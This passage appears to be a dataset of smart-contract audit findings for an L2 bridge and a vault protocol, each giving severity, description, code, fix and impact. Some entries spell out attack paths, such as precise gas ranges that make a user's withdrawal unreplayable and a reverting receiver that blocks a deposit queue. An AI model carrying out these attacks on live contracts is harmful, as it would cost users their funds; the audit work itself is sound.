broad impact on the system. It'll create a discrepancy in gas usage and payment on L1 and L2: on L1, users will pay for less gas than actually will be consumed by cross-chain messages.\\nAlso, since messages sent from L1 to L2 (via OptimismPortal.depositTransaction) are priced using an EIP-1559-like mechanism (via ResourceMetering._metered), the mechanism will fail to detect the actual demand for gas and will generally set lower gas prices, while actual gas consumption will be higher.\\nThe following bytes are excluded from gas usage counting:\\nthe 4 bytes of the `relayMessage` selector;\\nthe 32 bytes of the message nonce;\\nthe address of the sender (20 bytes);\\nthe address of the recipient (20 bytes);\\nthe amount of ETH sent with the message (32 bytes);\\nthe minimal gas limit of the nested message (32 bytes).\\nThus, every cross-chain message sent via the bridge or the messenger will contain 140 bytes that won't be paid by users. The bytes will however be processed by the node and accounted in the gas consumption.ч```\\ndataLen := uint64(len(data))\\n// Bump the required gas by the amount of transactional data\\nif dataLen > 0 {\\n // rest of code\\n}\\n```\\n -Malicious actor can prevent migration by calling a non-existing function in `OVM_L2ToL1MessagePasser` and making `ReadWitnessData` return an errorчmediumчThere is a mismatch between collected witness data in l2geth to the parsing of the collected data during migration. The mismatch will return an error and halt the migration until the data will be cleaned.\\nWitness data is collected from L2geth using a state dumper that collects any call to `OVM_L2ToL1MessagePasser`. The data is collected regardless of the calldata itself. Any call to `OVM_L2ToL1MessagePasser` will be collected. The data will persist regardless of the status of the transaction.\\n```\\n func (evm *EVM) Call(caller ContractRef, addr common.Address, input []byte, gas uint64, value *big.Int) (ret []byte, leftOverGas uint64, err error) { \\n if addr == dump.MessagePasserAddress { \\n statedumper.WriteMessage(caller.Address(), input) \\n } \\n```\\n\\nThe data will be stored in a file in the following format: \"MSG||\"\\nAt the start of the migration process, in order to unpack the message from the calldata, the code uses the first 4 bytes to lookup the the selector of `passMessageToL1` from the calldata and unpack the calldata according to the ABI.\\n```\\n method, err := abi.MethodById(msgB[:4])\\n if err != nil {\\n return nil, nil, fmt.Errorf(\"failed to get method: %w\", err)\\n }\\n\\n out, err := method.Inputs.Unpack(msgB[4:])\\n if err != nil {\\n return nil, nil, fmt.Errorf(\"failed to unpack: %w\", err)\\n }\\n```\\n\\nAs can be seen above, the function will return an error that is bubbled up to stop the migration if:\\nThe calldata first 4 bytes is not a selector of a function from the ABI of `OVM_L2ToL1MessagePasser`\\nThe parameters encoded with the selectors are not unpackable (are not the parameters specified by the ABI)\\nA malicious actor will call any non-existing function in the address of `OVM_L2ToL1MessagePasser`. The message will be stored in the witness data and cause an error during migration.\\n`ReadWitnessData` is called to parse they json witness data before any filtering is in place.чInstead of bubbling up an error, simply continue to the next message. This shouldn't cause a problem since in the next stages of the migration there are checks to validate any missing messages from the storage.чAn arbitrary user can halt the migration processч```\\n func (evm *EVM) Call(caller ContractRef, addr common.Address, input []byte, gas uint64, value *big.Int) (ret []byte, leftOverGas uint64, err error) { \\n if addr == dump.MessagePasserAddress { \\n statedumper.WriteMessage(caller.Address(), input) \\n } \\n```\\n -Causing users lose fund if bridging long message from L2 to L1 due to uncontrolled out-of-gas errorчmediumчIf the amount of gas provided during finalizing withdrawal transactions passes the check in `callWithMinGas`, it is not guaranteed that the relaying message transaction does not go out of gas. This can happen if the bridged message from L2 to L1 is long enough to increase the gas consumption significantly so that the predicted `baseGas` is not accurate enough.\\nSo far so good.\\nAs a result, while the transaction `OptimismPortal.finalizeWithdrawalTransaction` sets the flag `finalizedWithdrawals[withdrawalHash]` as `true`, the flags `failedMessages[versionedHash]` and `successfulMessages[versionedHash]` are `false`. So, the users can not replay their message, and his fund is lost.\\nThe question is that is there any possibility that `L1CrossDomainMessenger` reverts due to OOG, even though the required gas is calculated in L2 in the function `baseGas`?\\nSo, the amount of gas available to `L1CrossDomainMessenger` will be: `(G - K1 - 51)*(63/64)` Please note this number is based on the estimation of gas consumption explained in the comment:\\n// Because EIP-150 ensures that, a maximum of 63/64ths of the remaining gas in the call // frame may be passed to a subcontext, we need to ensure that the gas will not be // truncated to hold this function's invariant: \"If a call is performed by // `callWithMinGas`, it must receive at least the specified minimum gas limit.\" In // addition, exactly 51 gas is consumed between the below `GAS` opcode and the `CALL` // opcode, so it is factored in with some extra room for error.\\nIn the function `L1CrossDomainMessenger.relayMessage`, some gas will be consumed from line 299 to line 360. For simplicity, I call this amount of gas `K2 + HashingGas`, i.e. the consumed gas is separated for later explanation. In other words, the sum of consumed gas from line 299 to 303 and the consumed gas from line 326 to 360, is called `K2`, and the consumed gas from line 304 to line 325 is called `HashingGas`.\\nSo, the `gasLeft()` in line 361 will be: `(G - K1 - 51)*(63/64) - K2 - HashingGas`\\nTo pass the condition `gasleft() >= ((_minGas + 200) * 64) / 63` in `L1CrossDomainMessenger`, it is necessary to have: `(G - K1 - 51)*(63/64) - K2 - HashingGas >= ((_minGas + 200) * 64) / 63` Please note that, `_minGas` here is equal to `_minGasLimit` which is the amount of gas set by the user to be forwarded to the final receiver on L1. So, after simplification: `G >= [((_minGasLimit + 200) * 64) / 63 + K2 + HashingGas] *(64/63) + 51 + K1`\\nAll in all:\\nTo pass the gas check in OptimismPortal: `G >= ((_minGasLimit * (1016/1000) + messageLength * 16 + 200_000 + 200) * 64) / 63 + K1`\\nTo pass the gas check in L1CrossDomainMessenger: `G >= [((_minGasLimit + 200) * 64) / 63 + K2 + HashingGas] *(64/63) + 51 + K1`\\nIf, `G` is between these two numbers (bigger than the first one, and smaller than the second one), it will pass the check in `OptimismPortal`, but it will revert in `L1CrossDomainMessenger`, as a result it is possible to attack.\\nSince, K1 and K2 are almost equal to 50_000, after simplification:\\n`G >= (_minGasLimit * (1016/1000) + messageLength * 16 ) * (64 / 63) + 253_378`\\n`G >= (_minGasLimit * (64 / 63) + HashingGas) *(64/63) + 101_051`\\nSo it is necessary to satisfy the following condition to be able to attack (in that case it is possible that the attacker provides gas amount between the higher and lower bound to execute the attack): (_minGasLimit * (1016/1000) + messageLength * 16 ) * (64 / 63) + 253_378 < (_minGasLimit * (64 / 63) + HashingGas) *(64/63) + 101_051After simplification, we have:messageLength < (HashingGas - 150_000) / 16`\\nPlease note that the `HashingGas` is a function of `messageLength`. In other words, the consumed gas from Line 304 to 325 is a function of `messageLength`, the longer length the higher gas consumption, but the relation is not linear, it is exponential.**\\nSo, for version zero, the condition can be relaxed to: `messageLength < (HashingGas * 2 - 150_000) / 16`\\nThe calculation shows that if the `messageLength` is equal to 1 mb for version 0, the gas consumed during hashing will be around 23.5M gas (this satisfies the condition above). While, if the `messageLength` is equal to 512 kb for version 0, the gas consumed during hashing will be around 7.3M gas (this does not satisfy the condition above marginally).\\nA short summary of calculation is:\\nmessageLength= 128 kb, HashingGas for v1= 508_000, HahingGas for v0= 1_017_287, attack not possible messageLength= 256 kb, HashingGas for v1= 1_290_584, HahingGas for v0= 2_581_168, attack not possible messageLength= 512 kb, HashingGas for v1= 3_679_097, HahingGas for v0= 7_358_194, attack not possible messageLength= 684 kb, HashingGas for v1= 5_901_416, HahingGas for v0= 11_802_831, attack possible messageLength= 1024 kb, HashingGas for v1= 11_754_659, HahingGas for v0= 23_509_318, attack possible\\n\\nWhich can be calculated approximately by:\\n```\\nfunction checkGasV1(bytes calldata _message)\\n public\\n view\\n returns (uint256, uint256)\\n {\\n uint256 gas1 = gasleft();\\n bytes32 versionedHash = Hashing.hashCrossDomainMessageV1(\\n 0,\\n address(this),\\n address(this),\\n 0,\\n 0,\\n _message\\n );\\n uint256 gas2 = gasleft();\\n return (_message.length, (gas1 - gas2));\\n }\\n```\\n\\n```\\nfunction checkGasV0(bytes calldata _message)\\n public\\n view\\n returns (\\n uint256,\\n uint256,\\n uint256\\n )\\n {\\n uint256 gas1 = gasleft();\\n bytes32 versionedHash1 = Hashing.hashCrossDomainMessageV0(\\n address(this),\\n address(this),\\n _message,\\n 0\\n );\\n uint256 gas2 = gasleft();\\n uint256 gas3 = gasleft();\\n bytes32 versionedHash2 = Hashing.hashCrossDomainMessageV1(\\n 0,\\n address(this),\\n address(this),\\n 0,\\n 0,\\n _message\\n );\\n uint256 gas4 = gasleft();\\n return (_message.length, (gas1 - gas2), (gas3 - gas4));\\n }\\n```\\n\\nIt means that if for example the `messageLength` is equal to 684 kb (mostly non-zero, only 42 kb zero), and the message is version 0, and for example the `_minGasLimit` is equal to 21000, an attacker can exploit the user's withdrawal transaction by providing a gas meeting the following condition: `(_minGasLimit * (1016/1000) + 684 * 1024 * 16 ) * (64 / 63) + 253_378 < G < (_minGasLimit * (64 / 63) + 11_802_831) *(64/63) + 101_051` After, replacing the numbers, the provided gas by the attacker should be: `11_659_592 < G < 12_112_900` So, by providing almost 12M gas, it will pass the check in `OptimismPortal`, but it will revert in `L1CrossDomainMessenger` due to OOG, as a result the user's transaction will not be allowed to be replayed.\\nPlease note that if there is a long time between request of withdrawal transaction on L2 and finalizing withdrawal transaction on L1, it is possible that the gas price is low enough on L1, so economically reasonable for the attacker to execute it.\\nIn Summary:\\nWhen calculating the `baseGas` on L2, only the `minGasLimit` and `message.length` are considered, and a hardcoded overhead is also added. While, the hashing mechanism (due to memory expansion) is exponentially related to the length of the message. It means that, the amount of gas usage during relaying the message can be increased to the level that is higher than calculated value in `baseGas`. So, if the length of the message is long enough (to increase the gas significantly due to memory expansion), it provides an attack surface so that the attacker provides the amount of gas that only pass the condition in `OptimismPortal`, but goes out of gas in `L1CrossDomainMessenger`.чIf all the gas is consumed before reaching to L361, the vulnerability is available. So, it is recommended to include memory expansion effect when calculating `baseGas`.чUsers will lose fund because it is set as finalized, but not set as failed. So, they can not replay it.ч```\\nfunction checkGasV1(bytes calldata _message)\\n public\\n view\\n returns (uint256, uint256)\\n {\\n uint256 gas1 = gasleft();\\n bytes32 versionedHash = Hashing.hashCrossDomainMessageV1(\\n 0,\\n address(this),\\n address(this),\\n 0,\\n 0,\\n _message\\n );\\n uint256 gas2 = gasleft();\\n return (_message.length, (gas1 - gas2));\\n }\\n```\\n -Funds can be stolen because of incorrect update to `ownerToRollOverQueueIndex` for existing rolloversчhighчIn the case where the owner has an existing rollover, the `ownerToRollOverQueueIndex` incorrectly updates to the last queue index. This causes the `notRollingOver` check to be performed on the incorrect `_id`, which then allows the depositor to withdraw funds that should've been locked.\\nIn `enlistInRollover()`, if the user has an existing rollover, it overwrites the existing data:\\n```\\nif (ownerToRollOverQueueIndex[_receiver] != 0) {\\n // if so, update the queue\\n uint256 index = getRolloverIndex(_receiver);\\n rolloverQueue[index].assets = _assets;\\n rolloverQueue[index].epochId = _epochId;\\n```\\n\\nHowever, regardless of whether the user has an existing rollover, the `ownerToRolloverQueueIndex` points to the last item in the queue:\\n```\\nownerToRollOverQueueIndex[_receiver] = rolloverQueue.length;\\n```\\n\\nThus, the `notRollingOver` modifier will check the incorrect item for users with existing rollovers:\\n```\\nQueueItem memory item = rolloverQueue[getRolloverIndex(_receiver)];\\nif (\\n item.epochId == _epochId &&\\n (balanceOf(_receiver, _epochId) - item.assets) < _assets\\n) revert AlreadyRollingOver();\\n```\\n\\nallowing the user to withdraw assets that should've been locked.чThe `ownerToRollOverQueueIndex` should be pointing to the last item in the queue in the `else` case only: when the user does not have an existing rollover queue item.\\n```\\n} else {\\n // if not, add to queue\\n rolloverQueue.push(\\n QueueItem({\\n assets: _assets,\\n receiver: _receiver,\\n epochId: _epochId\\n })\\n );\\n// Add the line below\\n ownerToRollOverQueueIndex[_receiver] = rolloverQueue.length;\\n}\\n// Remove the line below\\n ownerToRollOverQueueIndex[_receiver] = rolloverQueue.length;\\n```\\nчUsers are able to withdraw assets that should've been locked for rollovers.ч```\\nif (ownerToRollOverQueueIndex[_receiver] != 0) {\\n // if so, update the queue\\n uint256 index = getRolloverIndex(_receiver);\\n rolloverQueue[index].assets = _assets;\\n rolloverQueue[index].epochId = _epochId;\\n```\\n -When rolling over, user will lose his winnings from previous epochчhighчWhen `mintRollovers` is called, when the function mints shares for the new epoch for the user, the amount of shares minted will be the same as the original assets he requested to rollover - not including the amount he won. After this, all these asset shares from the previous epoch are burnt. So the user won't be able to claim his winnings.\\nWhen user requests to `enlistInRollover`, he supplies the amount of assets to rollover, and this is saved in the queue.\\n```\\nrolloverQueue[index].assets = _assets;\\n```\\n\\nWhen `mintRollovers` is called, the function checks if the user won the previous epoch, and proceeds to burn all the shares the user requested to roll:\\n```\\n if (epochResolved[queue[index].epochId]) {\\n uint256 entitledShares = previewWithdraw(\\n queue[index].epochId,\\n queue[index].assets\\n );\\n // mint only if user won epoch he is rolling over\\n if (entitledShares > queue[index].assets) {\\n // rest of code\\n // @note we know shares were locked up to this point\\n _burn(\\n queue[index].receiver,\\n queue[index].epochId,\\n queue[index].assets\\n );\\n```\\n\\nThen, and this is the problem, the function mints to the user his original assets - `assetsToMint` - and not `entitledShares`.\\n```\\nuint256 assetsToMint = queue[index].assets - relayerFee;\\n_mintShares(queue[index].receiver, _epochId, assetsToMint);\\n```\\n\\nSo the user has only rolled his original assets, but since all his share of them is burned, he will not be able anymore to claim his winnings from them.\\nNote that if the user had called `withdraw` instead of rolling over, all his shares would be burned, but he would receive his `entitledShares`, and not just his original assets. We can see in this in `withdraw`. Note that `_assets` is burned (like in minting rollover) but `entitledShares` is sent (unlike minting rollover, which only remints _assets.)\\n```\\n _burn(_owner, _id, _assets);\\n _burnEmissions(_owner, _id, _assets);\\n uint256 entitledShares;\\n uint256 entitledEmissions = previewEmissionsWithdraw(_id, _assets);\\n if (epochNull[_id] == false) {\\n entitledShares = previewWithdraw(_id, _assets);\\n } else {\\n entitledShares = _assets;\\n }\\n if (entitledShares > 0) {\\n SemiFungibleVault.asset.safeTransfer(_receiver, entitledShares);\\n }\\n if (entitledEmissions > 0) {\\n emissionsToken.safeTransfer(_receiver, entitledEmissions);\\n }\\n```\\nчEither remint the user his winnings also, or if you don't want to make him roll over the winnings, change the calculation so he can still withdraw his shares of the winnings.чUser will lose his rewards when rolling over.ч```\\nrolloverQueue[index].assets = _assets;\\n```\\n -Adversary can break deposit queue and cause loss of fundsчhighчCarousel.sol#L531-L538\\n```\\nfunction _mintShares(\\n address to,\\n uint256 id,\\n uint256 amount\\n) internal {\\n _mint(to, id, amount, EMPTY);\\n _mintEmissions(to, id, amount);\\n}\\n```\\n\\nWhen processing deposits for the deposit queue, it _mintShares to the specified receiver which makes a _mint subcall.\\nERC1155.sol#L263-L278\\n```\\nfunction _mint(address to, uint256 id, uint256 amount, bytes memory data) internal virtual {\\n require(to != address(0), \"ERC1155: mint to the zero address\");\\n\\n address operator = _msgSender();\\n uint256[] memory ids = _asSingletonArray(id);\\n uint256[] memory amounts = _asSingletonArray(amount);\\n\\n _beforeTokenTransfer(operator, address(0), to, ids, amounts, data);\\n\\n _balances[id][to] += amount;\\n emit TransferSingle(operator, address(0), to, id, amount);\\n\\n _afterTokenTransfer(operator, address(0), to, ids, amounts, data);\\n\\n _doSafeTransferAcceptanceCheck(operator, address(0), to, id, amount, data);\\n}\\n```\\n\\nThe base ERC1155 _mint is used which always behaves the same way that ERC721 safeMint does, that is, it always calls _doSafeTrasnferAcceptanceCheck which makes a call to the receiver. A malicious user can make the receiver always revert. This breaks the deposit queue completely. Since deposits can't be canceled this WILL result in loss of funds to all users whose deposits are blocked. To make matters worse it uses first in last out so the attacker can trap all deposits before themчOverride _mint to remove the safeMint behavior so that users can't DOS the deposit queueчUsers who deposited before the adversary will lose their entire depositч```\\nfunction _mintShares(\\n address to,\\n uint256 id,\\n uint256 amount\\n) internal {\\n _mint(to, id, amount, EMPTY);\\n _mintEmissions(to, id, amount);\\n}\\n```\\n -Controller doesn't send treasury funds to the vault's treasury addressчmediumчThe Controller contract sends `treasury` funds to its own immutable `treasury` address instead of sending the funds to the one stored in the respective vault contract.\\nEach vault has a treasury address that is assigned on deployment which can also be updated through the factory contract:\\n```\\n constructor(\\n // // rest of code\\n address _treasury\\n ) SemiFungibleVault(IERC20(_assetAddress), _name, _symbol, _tokenURI) {\\n // // rest of code\\n treasury = _treasury;\\n whitelistedAddresses[_treasury] = true;\\n }\\n\\n function setTreasury(address _treasury) public onlyFactory {\\n if (_treasury == address(0)) revert AddressZero();\\n treasury = _treasury;\\n }\\n```\\n\\nBut, the Controller, responsible for sending the fees to the treasury, uses the immutable treasury address that it was initialized with:\\n```\\n constructor(\\n // // rest of code\\n address _treasury\\n ) {\\n // // rest of code\\n treasury = _treasury;\\n }\\n\\n // @audit just one example. Search for `treasury` in the Controller contract to find the others\\n function triggerEndEpoch(uint256 _marketId, uint256 _epochId) public {\\n // // rest of code\\n \\n // send premium fees to treasury and remaining TVL to collateral vault\\n premiumVault.sendTokens(_epochId, premiumFee, treasury);\\n // strike price reached so collateral is entitled to collateralTVLAfterFee\\n premiumVault.sendTokens(\\n _epochId,\\n premiumTVLAfterFee,\\n address(collateralVault)\\n );\\n\\n // // rest of code\\n }\\n```\\nчThe Controller should query the Vault to get the correct treasury address, e.g.:\\n```\\ncollateralVault.sendTokens(_epochId, collateralFee, collateralVault.treasury());\\n```\\nчIt's not possible to have different treasury addresses for different vaults. It's also not possible to update the treasury address of a vault although it has a function to do that. Funds will always be sent to the address the Controller was initialized with.ч```\\n constructor(\\n // // rest of code\\n address _treasury\\n ) SemiFungibleVault(IERC20(_assetAddress), _name, _symbol, _tokenURI) {\\n // // rest of code\\n treasury = _treasury;\\n whitelistedAddresses[_treasury] = true;\\n }\\n\\n function setTreasury(address _treasury) public onlyFactory {\\n if (_treasury == address(0)) revert AddressZero();\\n treasury = _treasury;\\n }\\n```\\n -User deposit may never be entertained from deposit queueчmediumчDue to FILO (first in last out) stack structure, while dequeuing, the first few entries may never be retrieved. These means User deposit may never be entertained from deposit queue if there are too many deposits\\nAssume User A made a deposit which becomes 1st entry in `depositQueue`\\nPost this X more deposits were made, so `depositQueue.length=X+1`\\nRelayer calls `mintDepositInQueue` and process `X-9` deposits\\n```\\n while ((length - _operations) <= i) {\\n // this loop impelements FILO (first in last out) stack to reduce gas cost and improve code readability\\n // changing it to FIFO (first in first out) would require more code changes and would be more expensive\\n _mintShares(\\n queue[i].receiver,\\n _epochId,\\n queue[i].assets - relayerFee\\n );\\n emit Deposit(\\n msg.sender,\\n queue[i].receiver,\\n _epochId,\\n queue[i].assets - relayerFee\\n );\\n depositQueue.pop();\\n if (i == 0) break;\\n unchecked {\\n i--;\\n }\\n }\\n```\\n\\nThis reduces deposit queue to only 10\\nBefore relayer could process these, Y more deposits were made which increases deposit queue to `y+10`\\nThis means Relayer might not be able to again process User A deposit as this deposit is lying after processing `Y+9` depositsчAllow User to dequeue deposit queue based on index, so that if such condition arises, user would be able to dequeue his deposit (independent of relayer)чUser deposit may remain stuck in deposit queue if a large number of deposit are present in queue and relayer is interested in dequeuing all entriesч```\\n while ((length - _operations) <= i) {\\n // this loop impelements FILO (first in last out) stack to reduce gas cost and improve code readability\\n // changing it to FIFO (first in first out) would require more code changes and would be more expensive\\n _mintShares(\\n queue[i].receiver,\\n _epochId,\\n queue[i].assets - relayerFee\\n );\\n emit Deposit(\\n msg.sender,\\n queue[i].receiver,\\n _epochId,\\n queue[i].assets - relayerFee\\n );\\n depositQueue.pop();\\n if (i == 0) break;\\n unchecked {\\n i--;\\n }\\n }\\n```\\n -changeTreasury() Lack of check and remove oldчmediumчchangeTreasury() Lack of check and remove old\\nchangeTreasury() used to set new treasury The code is as follows:\\n```\\n function changeTreasury(uint256 _marketId, address _treasury)\\n public\\n onlyTimeLocker\\n {\\n if (_treasury == address(0)) revert AddressZero();\\n\\n address[2] memory vaults = marketIdToVaults[_marketId];\\n\\n if (vaults[0] == address(0) || vaults[1] == address(0)) {\\n revert MarketDoesNotExist(_marketId);\\n }\\n IVaultV2(vaults[0]).whiteListAddress(_treasury);\\n IVaultV2(vaults[1]).whiteListAddress(_treasury);\\n IVaultV2(vaults[0]).setTreasury(treasury);\\n IVaultV2(vaults[1]).setTreasury(treasury);\\n\\n emit AddressWhitelisted(_treasury, _marketId);\\n }\\n```\\n\\nThe above code has the following problem:\\nno check whether the new treasury same as the old. If it is the same, the whitelist will be canceled.\\nUse setTreasury(VaultFactoryV2.treasury), it should be setTreasury(_treasury)\\nnot cancel old treasury from the whitelistч```\\n function changeTreasury(uint256 _marketId, address _treasury)\\n public\\n onlyTimeLocker\\n {\\n if (_treasury == address(0)) revert AddressZero();\\n\\n address[2] memory vaults = marketIdToVaults[_marketId];\\n\\n if (vaults[0] == address(0) || vaults[1] == address(0)) {\\n revert MarketDoesNotExist(_marketId);\\n }\\n\\n+ require(vaults[0].treasury() !=_treasury,\"same\"); //check same\\n+ IVaultV2(vaults[0]).whiteListAddress(vaults[0].treasury()); //cancel old whitelist\\n+ IVaultV2(vaults[1]).whiteListAddress(vaults[1].treasury()); //cancel old whitelist\\n\\n IVaultV2(vaults[0]).whiteListAddress(_treasury);\\n IVaultV2(vaults[1]).whiteListAddress(_treasury);\\n+ IVaultV2(vaults[0]).setTreasury(_treasury);\\n+ IVaultV2(vaults[1]).setTreasury(_treasury);\\n- IVaultV2(vaults[0]).setTreasury(treasury);\\n- IVaultV2(vaults[1]).setTreasury(treasury);\\n\\n emit AddressWhitelisted(_treasury, _marketId);\\n }\\n```\\nчwhiteListAddress abnormalч```\\n function changeTreasury(uint256 _marketId, address _treasury)\\n public\\n onlyTimeLocker\\n {\\n if (_treasury == address(0)) revert AddressZero();\\n\\n address[2] memory vaults = marketIdToVaults[_marketId];\\n\\n if (vaults[0] == address(0) || vaults[1] == address(0)) {\\n revert MarketDoesNotExist(_marketId);\\n }\\n IVaultV2(vaults[0]).whiteListAddress(_treasury);\\n IVaultV2(vaults[1]).whiteListAddress(_treasury);\\n IVaultV2(vaults[0]).setTreasury(treasury);\\n IVaultV2(vaults[1]).setTreasury(treasury);\\n\\n emit AddressWhitelisted(_treasury, _marketId);\\n }\\n```\\n -mintRollovers should require entitledShares >= relayerFeeчmediumчmintRollovers should require entitledShares >= relayerFee\\nIn mintRollovers, the rollover is only not skipped if queue[index].assets >= relayerFee,\\n```\\n if (entitledShares > queue[index].assets) {\\n // skip the rollover for the user if the assets cannot cover the relayer fee instead of revert.\\n if (queue[index].assets < relayerFee) {\\n index++;\\n continue;\\n }\\n```\\n\\nIn fact, since the user is already profitable, entitledShares is the number of assets of the user, which is greater than queue[index].assets, so it should check that entitledShares >= relayerFee, and use entitledShares instead of queue[index].assets to subtract relayerFee when calculating assetsToMint later.чChange to\\n```\\n if (entitledShares > queue[index].assets) {\\n // skip the rollover for the user if the assets cannot cover the relayer fee instead of revert.\\n// Remove the line below\\n if (queue[index].assets < relayerFee) {\\n// Add the line below\\n if (entitledShares < relayerFee) {\\n index// Add the line below\\n// Add the line below\\n;\\n continue;\\n }\\n// rest of code\\n// Remove the line below\\n uint256 assetsToMint = queue[index].assets // Remove the line below\\n relayerFee;\\n// Add the line below\\n uint256 assetsToMint = entitledShares // Remove the line below\\n relayerFee;\\n```\\nчThis will prevent rollover even if the user has more assets than relayerFeeч```\\n if (entitledShares > queue[index].assets) {\\n // skip the rollover for the user if the assets cannot cover the relayer fee instead of revert.\\n if (queue[index].assets < relayerFee) {\\n index++;\\n continue;\\n }\\n```\\n -Vault Factory ownership can be changed immediately and bypass timelock delayчmediumчThe VaultFactoryV2 contract is supposed to use a timelock contract with a delay period when changing its owner. However, there is a loophole that allows the owner to change the owner address instantly, without waiting for the delay period to expire. This defeats the purpose of the timelock contract and exposes the VaultFactoryV2 contract to potential abuse.\\nIn project description, timelock is required when making critical changes. Admin can only configure new markets and epochs on those markets.\\n```\\n 2) Admin can configure new markets and epochs on those markets, Timelock can make cirital changes like changing the oracle or whitelisitng controllers.\\n```\\n\\nThe VaultFactoryV2 contract has a `changeOwner` function that is supposed to be called only by the timelock contract with a delay period.\\n```\\nfunction changeOwner(address _owner) public onlyTimeLocker {\\n if (_owner == address(0)) revert AddressZero();\\n _transferOwnership(_owner);\\n }\\n```\\n\\nThe VaultFactoryV2 contract inherits from the Openzeppelin Ownable contract, which has a `transferOwnership` function that allows the owner to change the owner address immediately. However, the `transferOwnership` function is not overridden by the `changeOwner` function, which creates a conflict and a vulnerability. The owner can bypass the timelock delay and use the `transferOwnership` function to change the owner address instantly.\\n```\\n function transferOwnership(address newOwner) public virtual onlyOwner {\\n require(newOwner != address(0), \"Ownable: new owner is the zero address\");\\n _transferOwnership(newOwner);\\n }\\n```\\nчOverride the `transferOwnership` function and add modifier `onlyTimeLocker`.чThe transferOwnership is not worked as design (using timelock), the timelock delay become useless. This means that if the owner address is hacked or corrupted, the attacker can take over the contract immediately, leaving no time for the protocol and the users to respond or intervene.ч```\\n 2) Admin can configure new markets and epochs on those markets, Timelock can make cirital changes like changing the oracle or whitelisitng controllers.\\n```\\n -VaultFactoryV2#changeTreasury misconfigures the vaultчmediumчVaultFactoryV2#changeTreasury misconfigures the vault because the setTreasury subcall uses the wrong variable\\nVaultFactoryV2.sol#L228-L246\\n```\\nfunction changeTreasury(uint256 _marketId, address _treasury)\\n public\\n onlyTimeLocker\\n{\\n if (_treasury == address(0)) revert AddressZero();\\n\\n address[2] memory vaults = marketIdToVaults[_marketId];\\n\\n if (vaults[0] == address(0) || vaults[1] == address(0)) {\\n revert MarketDoesNotExist(_marketId);\\n }\\n\\n IVaultV2(vaults[0]).whiteListAddress(_treasury);\\n IVaultV2(vaults[1]).whiteListAddress(_treasury);\\n IVaultV2(vaults[0]).setTreasury(treasury);\\n IVaultV2(vaults[1]).setTreasury(treasury);\\n\\n emit AddressWhitelisted(_treasury, _marketId);\\n}\\n```\\n\\nWhen setting the treasury for the underlying vault pair it accidentally use the treasury variable instead of _treasury. This means it uses the local VaultFactoryV2 treasury rather than the function input.\\nControllerPeggedAssetV2.sol#L111-L123\\n```\\n premiumVault.sendTokens(_epochId, premiumFee, treasury);\\n premiumVault.sendTokens(\\n _epochId,\\n premiumTVL - premiumFee,\\n address(collateralVault)\\n );\\n // strike price is reached so collateral is still entitled to premiumTVL - premiumFee but looses collateralTVL\\n collateralVault.sendTokens(_epochId, collateralFee, treasury);\\n collateralVault.sendTokens(\\n _epochId,\\n collateralTVL - collateralFee,\\n address(premiumVault)\\n );\\n```\\n\\nThis misconfiguration can be damaging as it may cause the triggerDepeg call in the controller to fail due to the sendToken subcall. Additionally the time lock is the one required to call it which has a minimum of 3 days wait period. The result is that valid depegs may not get paid out since they are time sensitive.чSet to _treasury rather than treasury.чValid depegs may be missed due to misconfigurationч```\\nfunction changeTreasury(uint256 _marketId, address _treasury)\\n public\\n onlyTimeLocker\\n{\\n if (_treasury == address(0)) revert AddressZero();\\n\\n address[2] memory vaults = marketIdToVaults[_marketId];\\n\\n if (vaults[0] == address(0) || vaults[1] == address(0)) {\\n revert MarketDoesNotExist(_marketId);\\n }\\n\\n IVaultV2(vaults[0]).whiteListAddress(_treasury);\\n IVaultV2(vaults[1]).whiteListAddress(_treasury);\\n IVaultV2(vaults[0]).setTreasury(treasury);\\n IVaultV2(vaults[1]).setTreasury(treasury);\\n\\n emit AddressWhitelisted(_treasury, _marketId);\\n}\\n```\\n -Null epochs will freeze rolloversчmediumчWhen rolling a position it is required that the user didn't payout on the last epoch. The issue with the check is that if a null epoch is triggered then rollovers will break even though the vault didn't make a payout\\nCarousel.sol#L401-L406\\n```\\n uint256 entitledShares = previewWithdraw(\\n queue[index].epochId,\\n queue[index].assets\\n );\\n // mint only if user won epoch he is rolling over\\n if (entitledShares > queue[index].assets) {\\n```\\n\\nWhen minting rollovers the following check is made so that the user won't automatically roll over if they made a payout last epoch. This check however will fail if there is ever a null epoch. Since no payout is made for a null epoch it should continue to rollover but doesn't.чChange to less than or equal to:\\n```\\n- if (entitledShares > queue[index].assets) {\\n+ if (entitledShares >= queue[index].assets) {\\n```\\nчRollover will halt after null epochч```\\n uint256 entitledShares = previewWithdraw(\\n queue[index].epochId,\\n queue[index].assets\\n );\\n // mint only if user won epoch he is rolling over\\n if (entitledShares > queue[index].assets) {\\n```\\n -Inconsistent use of epochBegin could lock user fundsчmediumчThe epochBegin timestamp is used inconsistently and could lead to user funds being locked.\\nThe function `ControllerPeggedAssetV2.triggerNullEpoch` checks for timestamp like this:\\n```\\nif (block.timestamp < uint256(epochStart)) revert EpochNotStarted();\\n```\\n\\nThe modifier `epochHasNotStarted` (used by Carousel.deposit) checks it like this:\\n```\\nif (block.timestamp > epochConfig[_id].epochBegin)\\n revert EpochAlreadyStarted();\\n```\\n\\nBoth functions can be called when `block.timestamp == epochBegin`. This could lead to a scenario where a deposit happens after `triggerNullEpoch` is called (both in the same block). Because `triggerNullEpoch` sets the value for `finalTVL`, the TVL that comes from the deposit is not accounted for. If emissions have been distributed this epoch, this will lead to the incorrect distribution of emissions and once all emissions have been claimed the remaining assets will not be claimable, due to reversion in `withdraw` when trying to send emissions:\\n```\\nfunction previewEmissionsWithdraw(uint256 _id, uint256 _assets)\\n public\\n view\\n returns (uint256 entitledAmount)\\n{\\n entitledAmount = _assets.mulDivDown(emissions[_id], finalTVL[_id]);\\n}\\n// rest of code\\n//in withdraw:\\nuint256 entitledEmissions = previewEmissionsWithdraw(_id, _assets);\\nif (epochNull[_id] == false) {\\n entitledShares = previewWithdraw(_id, _assets);\\n} else {\\n entitledShares = _assets;\\n}\\nif (entitledShares > 0) {\\n SemiFungibleVault.asset.safeTransfer(_receiver, entitledShares);\\n}\\nif (entitledEmissions > 0) {\\n emissionsToken.safeTransfer(_receiver, entitledEmissions);\\n}\\n```\\n\\nThe above could also lead to revert through division by 0 if `finalTVL` is set to 0, even though the deposit after was successful.чThe modifier `epochHasNotStarted` should use `>=` as comparatorчincorrect distribution, Loss of deposited fundsч```\\nif (block.timestamp < uint256(epochStart)) revert EpochNotStarted();\\n```\\n -Denial-of-Service in the liquidation flow results in the collateral NTF will be stuck in the contract.чmediumчIf the `loanTovalue` value of the offer is extremely high, the liquidation flow will be 